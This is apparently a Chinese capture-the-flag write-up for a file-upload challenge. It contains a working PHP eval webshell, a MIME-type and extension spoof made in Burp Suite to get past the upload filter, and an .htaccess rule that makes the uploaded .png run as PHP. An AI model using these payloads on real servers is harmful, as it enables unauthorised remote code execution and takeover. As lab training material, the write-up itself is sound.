题目名字已经很抽象了,没想到网页更加抽象,难蚌
看起来像是文件上传漏洞的题目,先写一个一句话木马上传下
horse.php
<script language='php'>eval($_POST['v']);</script>
被拦截了,果然不可能这么简单。使用burpsuite改下请求报文,将MIME类型改为image/png(gif不行,其他的没试),然后放到Repeater里重放下。
还是被拦截,这次改MIME的同时将filename的后缀名改为png,再次放包,这次可以通过了,同时还回显了路径
由于上传的木马是png格式没法直接被解析执行,所以我们尝试上传.htaccess配置文件来解析木马,同样修改MIME类型为image/png,filename改为".htaccess"
.htaccess:
<FilesMatch "horse">
SetHandler application/x-httpd-php
</FilesMatch>
上传成功
结合前面回显的上传路径,拼接出木马的url地址
http://1d2b0fc4-956b-4b63-bd52-0388bd217d07.node5.buuoj.cn:81/upload/b5bf4ab4385b778135ce73cdb721d445/horse.png
使用蚁剑连接,成功
在根目录下找到flag
---[End]---
Comments | NOTHING